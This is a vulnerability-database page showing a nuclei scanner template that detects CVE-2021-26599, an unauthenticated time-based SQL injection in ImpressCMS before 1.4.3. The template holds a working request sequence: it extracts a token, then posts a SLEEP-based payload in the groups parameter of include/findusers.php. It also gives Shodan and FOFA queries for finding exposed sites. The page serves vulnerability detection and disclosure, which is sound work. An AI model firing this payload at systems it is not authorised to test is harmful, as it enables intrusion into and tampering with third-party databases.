Lucene search
K

ImpressCMS < 1.4.3 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

ImpressCMS before 1.4.3 has a high severity SQL injection vulnerability in findusers.php.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
ImpressCMS 1.4.2 SQL Injection Vulnerability
23 Mar 202200:00
zdt
0day.today
ImpressCMS 1.4.2 - Remote Code Execution Exploit
30 Mar 202200:00
zdt
Circl
CVE-2021-26599
28 Mar 202207:39
circl
CNNVD
ImpressCMS SQL注入漏洞
22 Mar 202200:00
cnnvd
CNVD
ImpressCMS SQL Injection Vulnerability (CNVD-2022-30802)
24 Mar 202200:00
cnvd
CVE
CVE-2021-26599
28 Mar 202200:41
cve
Cvelist
CVE-2021-26599
28 Mar 202200:41
cvelist
Exploit DB
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
30 Mar 202200:00
exploitdb
EUVD
EUVD-2022-1455
3 Oct 202520:07
euvd
Github Security Blog
SQL Injection in ImpressCMS
29 Mar 202200:01
github
Rows per page
id: CVE-2021-26599

info:
  name: ImpressCMS < 1.4.3 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    ImpressCMS before 1.4.3 is vulnerable to SQL injection via the groups parameter in include/findusers.php, allowing unauthenticated attackers to execute arbitrary SQL queries.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries via SQL injection, potentially extracting sensitive database contents or modifying data.
  remediation: |
    Update ImpressCMS to version 1.4.3 or later.
  reference:
    - https://hackerone.com/reports/1081145
    - http://karmainsecurity.com/KIS-2022-04
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26599
  classification:
    cve-id: CVE-2021-26599
    cwe-id: CWE-89
    epss-score: 0.19419
    epss-percentile: 0.97028
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: impresscms
    product: impresscms
    shodan-query: http.html:"ImpressCMS"
    fofa-query: body="ImpressCMS"
  tags: cve,cve2021,impresscms,sqli,time-based-sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /misc.php?action=showpopups&type=friend HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "REQUEST' value='(.*)'"
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /include/findusers.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_submit=1&token={{token}}&groups[]=1%20OR%20SLEEP(7)#

    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - status_code==200
          - contains(body, "array(1) {")
        condition: and
# digest: 490a00463044022040d637c282af734714bc9279a4b5b4557a8a31274708091f66d3b2752eb48bf0022030b0834ebe979f54bdb07e31fc5bf7f51392286a2f976b0600494d30503b9be9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.5
CVSS 3.19.8
EPSS0.19419
17